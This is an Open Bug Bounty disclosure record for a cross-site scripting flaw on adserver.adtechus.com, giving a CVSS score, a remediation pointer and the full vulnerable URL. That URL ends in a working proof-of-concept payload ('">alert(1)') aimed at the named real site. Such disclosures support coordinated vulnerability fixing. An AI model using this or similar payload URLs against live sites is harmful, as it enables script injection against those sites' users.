adserver.adtechus.com XSS vulnerability

2018-03-12T12:10:00
ID OBB:578832
Type openbugbounty
Reporter newp_th
Modified 2018-04-12T17:23:00

Description

Open Bug Bounty ID: OBB-578832

Description| Value
---|---
Affected Website:| adserver.adtechus.com
Open Bug Bounty Program:| Not created yet
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Disclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://adserver.adtechus.com/adiframe/3.0/5512.1/4775115/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];misc='+new%20Date().getTime()+';rdclick=;misc=7430083587008828256;rdclick=https://adclick.g.doubleclick.net/aclk?sa=L&ai;=CcJ5U31-mWrv0J4TWkgOB9IjABJbw_rxN6uTGo4kBwI23ARABIABg5crlg7QOggEXY2EtcHViLTEwMDQxOTk0MDIwNzQzMDjIAQmoAwGqBIwBT9CH05_pQUgUC3RZIVdXUBvmtCQG-0pKhruYMeOY0vLcidY04pztosomHv9OEzo6XBA91WvudAfNtfOp-XUEkDxoTXRbBL-nuikCYkRXr0XmGZR3HgPMV90erhkbnWvUE6P9-M9Ckv2OnxwNnYQyFOXXcI9T5ObM6cgjCt4-eOdXbGNawYweG8OVYieABqiUkM6M5bLPkQGgBiGoB6a-G9gHANIIBQiAARAB">alert(1)